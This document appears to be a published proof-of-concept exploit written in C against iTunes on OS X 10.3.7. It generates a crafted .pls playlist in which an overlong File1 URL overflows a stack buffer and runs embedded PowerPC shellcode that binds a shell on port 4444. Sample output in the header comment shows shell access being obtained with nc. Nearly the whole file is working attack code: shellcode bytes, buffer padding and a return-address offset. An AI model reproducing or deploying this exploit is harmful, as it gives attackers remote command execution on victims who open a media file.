itunesPLS-local.txt

`/*  
* PoC for iTunes on OS X 10.3.7  
* -( [email protected] )-  
*  
* Generates a .pls file, when loaded in iTunes it  
* binds a shell to port 4444.  
* Shellcode contains no \x00 or \x0a's.  
*  
* sample output:  
*  
* -[nemo@gir:~]$ ./fm-eyetewnz foo.pls  
* -( fm-eyetewnz )-  
* -( [email protected] )-  
* Creating file: foo.pls.  
* Bindshell on port: 4444  
* -[nemo@gir:~]$ open foo.pls  
* -[nemo@gir:~]$ nc localhost 4444  
* id  
* uid=501(nemo) gid=501(nemo) groups=501(nemo)  
*  
* Thanks to andrewg, mercy and core.  
* Greetings to pulltheplug and felinemenace.  
*  
* -( need a challenge? )-  
* -( http://pulltheplug.org )-  
*/  
  
#include <stdio.h>  
#include <strings.h>  
  
#define BUFSIZE 1598 + 4  
  
char shellcode[] = /* large ugly shellcode generated by http://metasploit.com */  
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x07\xfa"  
"\x38\xa5\xf8\x4a\x3c\xc0\xee\x83\x60\xc6\xb7\xfb\x38\x85\x07\xee"  
"\x7c\x89\x03\xa6\x80\x9f\xf8\x4a\x7c\x84\x32\x78\x90\x9f\xf8\x4a"  
"\x7c\x05\xf8\xac\x7c\xff\x04\xac\x7c\x05\xff\xac\x3b\xc5\x07\xba"  
"\x7f\xff\xf2\x15\x42\x20\xff\xe0\x4c\xff\x01\x2c\xd6\xe3\xb7\xf9"  
"\xd6\x03\xb7\xfa\xd6\x23\xb7\xfd\xd6\x83\xb7\x9a\xaa\x83\xb7\xf9"  
"\x92\x83\xb5\x83\x92\xfd\xac\x83\xa6\x83\xb7\xf6\xee\x81\xa6\xa7"  
"\xee\x83\xb7\xfb\x92\x0b\xb5\x5d\xd6\x23\xb7\xeb\xd6\x83\xb7\x93"  
"\x91\x40\x44\x83\xaa\x83\xb7\xf9\x92\x83\xb5\x83\xd6\x83\xb7\x91"  
"\x91\x40\x44\x83\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x91\x40\x44\x83"  
"\xd6\x83\xb7\xe5\xd6\x03\xb7\xeb\x7e\x02\x48\x13\xd6\x22\x48\x13"  
"\xd6\x02\x48\x0b\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x92\xfd\xac\x83"  
"\xd6\x23\xb7\xf9\xd6\x83\xb7\xa1\x91\x40\x44\x83\x92\x27\x9c\x83"  
"\xaa\x83\xb7\xf9\x92\x83\xb5\x83\xd6\x26\x48\x04\xc2\x86\x48\x04"  
"\xae\x01\x48\x1e\xd6\x83\xb7\xb9\xaa\x83\xb7\xf9\x92\x83\xb5\x83"  
"\x92\x26\x9d\x82\xae\x01\x48\x06\x92\xeb\xb5\x5d\xd6\xe0\xb7\xd3"  
"\x7e\xe2\x48\x03\x7e\x22\x48\x07\xd6\x02\x48\x03\xd6\x83\xb7\xc0"  
"\x92\x83\xb3\x57\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x91\x63\xb7\xf3"  
"\xc1\xe1\xde\x95\xc1\xe0\xc4\x93\xee\x83\xb7\xfb";  
  
int main(int ac, char **av)  
{  
int n,*p;  
unsigned char * q;  
char buf[BUFSIZE];  
FILE *pls;  
int offset=0x3DA8;  
char playlist[] = {  
"[playlist]\n"  
"NumberOfEntries=1\n"  
"File1=http://"  
};  
printf("-( fm-eyetewnz )-\n");  
printf("-( [email protected] )-\n");  
memset(buf,'\x60',BUFSIZE);  
bcopy(shellcode, buf + (BUFSIZE - 44 - sizeof(shellcode)),sizeof(shellcode) - 1); // avoid mangled stack.  
q = buf + sizeof(buf) - 5;  
p = (int *)q;  
if(!(av[1])) {  
printf("usage: %s <filename (.pls)> [offset]\n",*av);  
exit(1);  
}  
if(av[2])  
offset = atoi(av[2]);  
*p = (0xc0000000 - offset);// 0xbfffc258;  
if(!(pls = fopen(*(av+1),"w+"))) {  
printf("error opening file: %s.\n", *(av +1));  
exit(1);  
}  
printf("Creating file: %s.\n",*(av+1));  
printf("Bindshell on port: 4444\n");  
fwrite(playlist,sizeof(playlist) - 1,1,pls);  
fwrite(buf,sizeof(buf) - 1,1,pls);  
fclose(pls);  
}  
  
`